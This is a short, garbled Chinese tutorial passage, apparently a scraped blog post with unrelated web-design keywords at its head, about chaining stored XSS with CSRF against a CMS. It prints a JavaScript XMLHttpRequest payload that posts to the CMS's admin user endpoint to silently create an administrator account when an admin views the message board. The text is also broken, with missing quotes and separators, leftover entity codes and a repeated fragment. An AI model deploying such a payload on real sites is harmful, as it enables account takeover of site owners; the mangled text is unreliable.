统一企业官方网站,网站欢迎页面在线设计,网站页面布局,平面设计案例网站假设我们获得了目标CMS的源码#xff0c;搭建了一个相同的网站#xff0c;我们在自己的网站执行添加用户的操作#xff0c;并且用bp抓包 如图#xff0c;这是我们抓到的添加用户的数据包 接下来#xff0c;我们可以根据数据包构造js代码
script
xmlhttp new XML…假设我们获得了目标CMS的源码搭建了一个相同的网站我们在自己的网站执行添加用户的操作并且用bp抓包 如图这是我们抓到的添加用户的数据包 接下来我们可以根据数据包构造js代码
script
xmlhttp new XMLHttpRequest();
xmlhttp.open(post,http://10.9.75.161/cms/admin/user.action.php,false);
xmlhttp.setRequestHeader(Content-type,application/x-www-form-urlencoded);
xmlhttp.send(actaddusernameadmin123456password123456password2123456button%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7userid0);
/script
接下来我们将js代码放到存储型XSS的地方当管理员浏览留言自动执行XSS 当管理员进入留言管理触发csrf 可以看到生成了目标账户
